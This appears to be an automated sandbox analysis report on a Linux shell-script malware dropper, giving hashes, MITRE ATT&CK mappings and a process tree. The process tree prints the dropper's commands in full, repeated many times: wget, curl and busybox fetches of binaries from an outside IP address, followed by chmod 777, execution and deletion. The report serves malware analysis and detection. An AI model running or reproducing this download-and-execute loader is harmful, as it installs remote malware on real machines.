27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb

General

Target

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Size

10KB
MD5

0e701247eed8c2ac85ce4310d37e674d
SHA1

7ca0caf639c6d80baffe549e24e3018daaa8bbb8
SHA256

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
SHA512

0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
SSDEEP

96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

835 chmod
805 chmod
823 chmod
793 chmod
684 chmod
763 chmod
744 chmod
785 chmod
829 chmod
706 chmod
729 chmod
811 chmod
817 chmod
673 chmod
799 chmod

pid	process
835	chmod
805	chmod
823	chmod
793	chmod
684	chmod
763	chmod
744	chmod
785	chmod
829	chmod
706	chmod
729	chmod
811	chmod
817	chmod
673	chmod
799	chmod

Executes dropped EXE 15 IoCs

Processes:

rpGQHUwVKCedv2rZ52NQukCAEyfangFC6myFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6sjNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk46wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgChkC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUKoieViux5SkcOflukQEESWqzwe8qoXmU0dorOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZTI1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYqA7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsHSKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkbWdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVArpGQHUwVKCedv2rZ52NQukCAEyfangFC6m

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 30 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 15 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	curl
File opened for modification	/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	curl
File opened for modification	/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	curl
File opened for modification	/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	curl
File opened for modification	/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	curl
File opened for modification	/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	curl
File opened for modification	/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	curl
File opened for modification	/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	curl
File opened for modification	/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	curl
File opened for modification	/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	curl
File opened for modification	/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	curl
File opened for modification	/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	curl

/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
1⤵
PID:643

/bin/rm
/bin/rm bins.sh
2⤵
PID:646

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:650

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:664

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:671

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:673

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:675

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:676

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:677

/usr/bin/curl
curl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:678

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:679

/bin/chmod
chmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- File and Directory Permissions Modification
PID:684

/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Executes dropped EXE
PID:686

/bin/rm
rm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:687

/usr/bin/wget
wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:689

/usr/bin/curl
curl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:702

/bin/chmod
chmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- File and Directory Permissions Modification
PID:706

/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Executes dropped EXE
PID:708

/bin/rm
rm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:709

/usr/bin/wget
wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:710

/usr/bin/curl
curl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:723

/bin/chmod
chmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- File and Directory Permissions Modification
PID:729

/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Executes dropped EXE
PID:731

/bin/rm
rm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:732

/usr/bin/wget
wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:733

/usr/bin/curl
curl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:742

/bin/chmod
chmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- File and Directory Permissions Modification
PID:744

/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Executes dropped EXE
PID:746

/bin/rm
rm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:747

/usr/bin/wget
wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:748

/usr/bin/curl
curl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:758

/bin/chmod
chmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- File and Directory Permissions Modification
PID:763

/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Executes dropped EXE
PID:764

/bin/rm
rm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:765

/usr/bin/wget
wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:767

/usr/bin/curl
curl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:773

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:780

/bin/chmod
chmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- File and Directory Permissions Modification
PID:785

/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Executes dropped EXE
PID:786

/bin/rm
rm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:787

/usr/bin/wget
wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:789

/usr/bin/curl
curl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:792

/bin/chmod
chmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- File and Directory Permissions Modification
PID:793

/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do
./oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Executes dropped EXE
PID:794

/bin/rm
rm oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:795

/usr/bin/wget
wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:796

/usr/bin/curl
curl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:798

/bin/chmod
chmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- File and Directory Permissions Modification
PID:799

/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Executes dropped EXE
PID:800

/bin/rm
rm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:801

/usr/bin/wget
wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:802

/usr/bin/curl
curl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:804

/bin/chmod
chmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- File and Directory Permissions Modification
PID:805

/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Executes dropped EXE
PID:806

/bin/rm
rm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:807

/usr/bin/wget
wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:808

/usr/bin/curl
curl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:810

/bin/chmod
chmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- File and Directory Permissions Modification
PID:811

/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Executes dropped EXE
PID:812

/bin/rm
rm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:813

/usr/bin/wget
wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:814

/usr/bin/curl
curl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:816

/bin/chmod
chmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- File and Directory Permissions Modification
PID:817

/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Executes dropped EXE
PID:818

/bin/rm
rm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:819

/usr/bin/wget
wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:820

/usr/bin/curl
curl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:822

/bin/chmod
chmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- File and Directory Permissions Modification
PID:823

/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Executes dropped EXE
PID:824

/bin/rm
rm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:825

/usr/bin/wget
wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:826

/usr/bin/curl
curl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:828

/bin/chmod
chmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- File and Directory Permissions Modification
PID:829

/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Executes dropped EXE
PID:830

/bin/rm
rm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:831

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:832

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:834

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:835

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:836

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:837

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:838

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/773-1-0xb6760000-0xb6771044-memory.dmp

Download
memory/820-2-0xb6778000-0xb6789044-memory.dmp

Download

ioc	pid	process
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	675	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	686	yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	708	jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	731	6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	746	5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	764	kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	786	NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	794	oieViux5SkcOflukQEESWqzwe8qoXmU0do
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	800	rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	806	I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	812	A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	818	SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	824	WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	830	8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	836	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads